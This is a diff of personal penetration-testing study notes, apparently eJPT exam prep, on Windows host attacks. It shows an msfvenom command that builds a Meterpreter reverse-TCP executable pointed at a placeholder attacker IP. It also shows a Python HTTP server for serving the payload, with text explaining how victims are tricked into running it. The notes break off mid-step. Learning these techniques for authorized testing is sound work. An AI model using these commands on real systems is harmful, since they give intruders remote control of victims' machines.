Miss-ikky/Mywiki/EJPT/Host & Network Penetration Testing/1. System and hostbased attacks/Windows/Windows Vulnerabilities.md

 ![[Pasted image 20230707111320.png]]

-Demo
+Demo - find password of administrator within a legitimate windows config file

 1. get access to victim
-	- generate meterpreter payload: msfvenom -p windows/x64/metrpreter/reverse_tcp LHOST=yourip LPORT=1234 -f exe >payload.exe
+	- generate meterpreter payload: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=yourip LPORT=1234 -f exe >payload.exe
 	- python -m SimpleHTTPServer 80
 		- This command starts a simple HTTP server using Python.
 The server listens on port 80, which is the default port for HTTP traffic.
 The reason why Python's built-in HTTP server is used to host the payload (`payload.exe`) is that it provides a convenient and lightweight way to serve the file to potential victims.
 By hosting the file on a server, an attacker can share the payload's download link and trick users into downloading and executing the malicious file.
 Once executed, the meterpreter payload establishes a reverse TCP connection back to the attacker's machine, enabling them to gain unauthorized access and control over the victim's system.
 	- Transfer file to victim system: